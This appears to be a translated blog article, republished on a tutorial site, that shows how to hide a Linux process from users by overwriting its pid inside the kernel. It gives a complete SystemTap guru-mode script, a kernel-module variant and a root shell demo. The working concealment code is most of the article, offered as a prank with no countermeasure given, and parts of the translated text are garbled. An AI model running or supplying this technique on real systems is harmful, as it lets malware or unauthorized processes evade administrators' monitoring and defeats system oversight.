One line of code teaches you how to hide Linux processes

Friends always ask me how to hide Linux processes. I ask them how hidden you want to be, hidden in the kernel or hidden from users.

The discussions online are all about hooking procfs or similar user-mode solutions, and they are all lengthy. I say that these scenarios are too big and too complicated. For those who want to see immediate results, seeing such a bunch of complicated things will probably discourage them.

This article introduces an unconventional method to hide Linux processes from users with just one line of code:

Just modify the pid of the process.

Note that it was Xiao Yin, so it's not worth countering. Just play a prank on the senior conference engineer for fun.
target->pid = 0x7fffffff;

The complete script is as follows:

#!/usr/bin/stap -g
#hide.stp

global pid;

function hide(who:long)
%{
 struct task_struct *target;

 target = pid_task(find_vpid(STAP_ARG_who), PIDTYPE_PID);
 target->pid = 0x7fffffff;
%}

probe begin
{
 pid = $1
 hide(pid);
 exit();
}

Come on, try it:

[root@localhost system]# ./tohide &
[1] 403
[root@localhost system]# ./hide.stp
[root@localhost system]#

You can use the following command to detect all binary files that can display processes:

for pid in $(ls /proc|awk '/^[0-9]+/{print $1}'); do 
 ls -l /proc/$pid/exe; 
done

If it is gone in procfs, ps will of course not be able to detect it.

If you think the guru-mode stap is weird, you can write your own independent Linux kernel module and use the modification and exit method:

target->pid = xxxx;
return -1;

Isn’t it much simpler than various hook methods? The so-called moving data instead of code!

Let me briefly explain the principle.

• When a task is created, the procfs directory structure is registered according to its pid.
• When displaying the procfs directory structure, traverse the task list using its pid as the key to find the procfs directory structure.
• 0x7fffffff (or any other reasonable value) is not registered at all and of course cannot be displayed.

No more words.

Once again, don't try to counter the methods described in this article, because something so simple is not worth countering, haha, right?

You can refer to my previous Rootkit series of articles to continue studying how Linux processes hide in the kernel. At the same time, I have given countermeasures for each method.

This is the end of this article about how to hide Linux processes with one line of code. For more information about Linux hidden processes, please search for previous articles on 123WORDPRESS.COM or continue to browse the related articles below. I hope everyone will support 123WORDPRESS.COM in the future!